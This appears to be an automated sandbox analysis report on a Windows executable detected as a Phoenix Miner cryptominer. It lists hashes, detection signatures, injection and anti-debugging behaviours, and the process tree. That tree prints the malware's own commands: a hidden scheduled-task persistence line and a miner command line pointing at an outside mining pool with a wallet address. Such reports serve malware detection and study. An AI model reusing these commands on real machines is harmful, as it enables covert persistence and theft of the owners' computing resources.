Analysis
-
max time kernel
135s -
max time network
138s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
30-09-2022 20:24
Static task
static1
Behavioral task
behavioral1
Sample
bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe
Resource
win7-20220812-en
General
-
Target
bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe
-
Size
850KB
-
MD5
617935448c3a5753762ac8c59d002b09
-
SHA1
547c265e6940de4eaa9b756f3eabd44e5945b8aa
-
SHA256
bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8
-
SHA512
88dfba3cc824a0430b14962395d0f5ed93eb559e077d9162b1d4577d1f8a1e2110a9e87b2e5eb928560f4f087964d923644b120c1b384b43f232c2b1ca6245de
-
SSDEEP
6144:5tvrVv35gx/v6TTBgU5dsbopjLn5i2Lm8pbu5n+QKyX37RodENtQsEb8bKQdh/zH:HpvJKOdsKjL33e7RodvB5
Malware Config
Signatures
-
Detectes Phoenix Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/2008-74-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix behavioral1/memory/2008-75-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix behavioral1/memory/2008-76-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix -
Executes dropped EXE 1 IoCs
Processes:
ICELIUF.exepid process 1096 ICELIUF.exe -
Processes:
resource yara_rule behavioral1/memory/2008-67-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral1/memory/2008-69-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral1/memory/2008-70-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral1/memory/2008-72-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral1/memory/2008-73-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral1/memory/2008-74-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral1/memory/2008-75-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral1/memory/2008-76-0x0000000140000000-0x000000014082B000-memory.dmp upx -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 272 cmd.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
RegSvcs.exepid process 2008 RegSvcs.exe 2008 RegSvcs.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
ICELIUF.exedescription pid process target process PID 1096 set thread context of 2008 1096 ICELIUF.exe RegSvcs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1756 timeout.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
ICELIUF.exepid process 1096 ICELIUF.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exeICELIUF.exedescription pid process Token: SeDebugPrivilege 1648 bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe Token: SeDebugPrivilege 1096 ICELIUF.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.execmd.exeICELIUF.execmd.exedescription pid process target process PID 1648 wrote to memory of 272 1648 bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe cmd.exe PID 1648 wrote to memory of 272 1648 bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe cmd.exe PID 1648 wrote to memory of 272 1648 bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe cmd.exe PID 272 wrote to memory of 1756 272 cmd.exe timeout.exe PID 272 wrote to memory of 1756 272 cmd.exe timeout.exe PID 272 wrote to memory of 1756 272 cmd.exe timeout.exe PID 272 wrote to memory of 1096 272 cmd.exe ICELIUF.exe PID 272 wrote to memory of 1096 272 cmd.exe ICELIUF.exe PID 272 wrote to memory of 1096 272 cmd.exe ICELIUF.exe PID 1096 wrote to memory of 960 1096 ICELIUF.exe cmd.exe PID 1096 wrote to memory of 960 1096 ICELIUF.exe cmd.exe PID 1096 wrote to memory of 960 1096 ICELIUF.exe cmd.exe PID 960 wrote to memory of 1240 960 cmd.exe schtasks.exe PID 960 wrote to memory of 1240 960 cmd.exe schtasks.exe PID 960 wrote to memory of 1240 960 cmd.exe schtasks.exe PID 1096 wrote to memory of 2008 1096 ICELIUF.exe RegSvcs.exe PID 1096 wrote to memory of 2008 1096 ICELIUF.exe RegSvcs.exe PID 1096 wrote to memory of 2008 1096 ICELIUF.exe RegSvcs.exe PID 1096 wrote to memory of 2008 1096 ICELIUF.exe RegSvcs.exe PID 1096 wrote to memory of 2008 1096 ICELIUF.exe RegSvcs.exe PID 1096 wrote to memory of 2008 1096 ICELIUF.exe RegSvcs.exe PID 1096 wrote to memory of 2008 1096 ICELIUF.exe RegSvcs.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe"C:\Users\Admin\AppData\Local\Temp\bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpE3CB.tmp.bat""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
-
C:\ProgramData\System0\ICELIUF.exe"C:\ProgramData\System0\ICELIUF.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ICELIUF" /tr "C:\ProgramData\System0\ICELIUF.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ICELIUF" /tr "C:\ProgramData\System0\ICELIUF.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -pool ssl://eu1-etc.ethermine.org:5555 -wal 0xaC24bB4F74b2c83F3ACa168B71B5f45764a95e91.Rig001 -coin etc -log 04⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\System0\ICELIUF.exeFilesize
850KB
MD5617935448c3a5753762ac8c59d002b09
SHA1547c265e6940de4eaa9b756f3eabd44e5945b8aa
SHA256bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8
SHA51288dfba3cc824a0430b14962395d0f5ed93eb559e077d9162b1d4577d1f8a1e2110a9e87b2e5eb928560f4f087964d923644b120c1b384b43f232c2b1ca6245de
-
C:\ProgramData\System0\ICELIUF.exeFilesize
850KB
MD5617935448c3a5753762ac8c59d002b09
SHA1547c265e6940de4eaa9b756f3eabd44e5945b8aa
SHA256bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8
SHA51288dfba3cc824a0430b14962395d0f5ed93eb559e077d9162b1d4577d1f8a1e2110a9e87b2e5eb928560f4f087964d923644b120c1b384b43f232c2b1ca6245de
-
C:\Users\Admin\AppData\Local\Temp\tmpE3CB.tmp.batFilesize
143B
MD54f8b501cb099b16c662033c8e4548db1
SHA11d9edcff827b723dd2b04417c9acb70494057da2
SHA2569fd0861069fdbc78207b44930fa777437f6f2723592c22775020632e530100c0
SHA512aaef261e3d3ae79b66473efb85ddfe62f2e41a50f9e7a03cfad72bbdc0e1db3cd1790717dc0d5fcd7c8dc6e7586193db7904e20a82ee7574c579aa6439403604
-
\ProgramData\System0\ICELIUF.exeFilesize
850KB
MD5617935448c3a5753762ac8c59d002b09
SHA1547c265e6940de4eaa9b756f3eabd44e5945b8aa
SHA256bbdf6022d12ea88e1fad8b6806e5353b407a12cac98b82e3742a6b6aef43d0a8
SHA51288dfba3cc824a0430b14962395d0f5ed93eb559e077d9162b1d4577d1f8a1e2110a9e87b2e5eb928560f4f087964d923644b120c1b384b43f232c2b1ca6245de
-
memory/272-55-0x0000000000000000-mapping.dmp
-
memory/960-64-0x0000000000000000-mapping.dmp
-
memory/1096-62-0x0000000000C70000-0x0000000000D48000-memory.dmpFilesize
864KB
-
memory/1096-59-0x0000000000000000-mapping.dmp
-
memory/1096-63-0x000007FEFB931000-0x000007FEFB933000-memory.dmpFilesize
8KB
-
memory/1240-65-0x0000000000000000-mapping.dmp
-
memory/1648-54-0x00000000012F0000-0x00000000013C8000-memory.dmpFilesize
864KB
-
memory/1756-57-0x0000000000000000-mapping.dmp
-
memory/2008-69-0x0000000140000000-0x000000014082B000-memory.dmpFilesize
8.2MB
-
memory/2008-67-0x0000000140000000-0x000000014082B000-memory.dmpFilesize
8.2MB
-
memory/2008-66-0x0000000140000000-0x000000014082B000-memory.dmpFilesize
8.2MB
-
memory/2008-71-0x0000000140829C40-mapping.dmp
-
memory/2008-70-0x0000000140000000-0x000000014082B000-memory.dmpFilesize
8.2MB
-
memory/2008-72-0x0000000140000000-0x000000014082B000-memory.dmpFilesize
8.2MB
-
memory/2008-73-0x0000000140000000-0x000000014082B000-memory.dmpFilesize
8.2MB
-
memory/2008-74-0x0000000140000000-0x000000014082B000-memory.dmpFilesize
8.2MB
-
memory/2008-75-0x0000000140000000-0x000000014082B000-memory.dmpFilesize
8.2MB
-
memory/2008-76-0x0000000140000000-0x000000014082B000-memory.dmpFilesize
8.2MB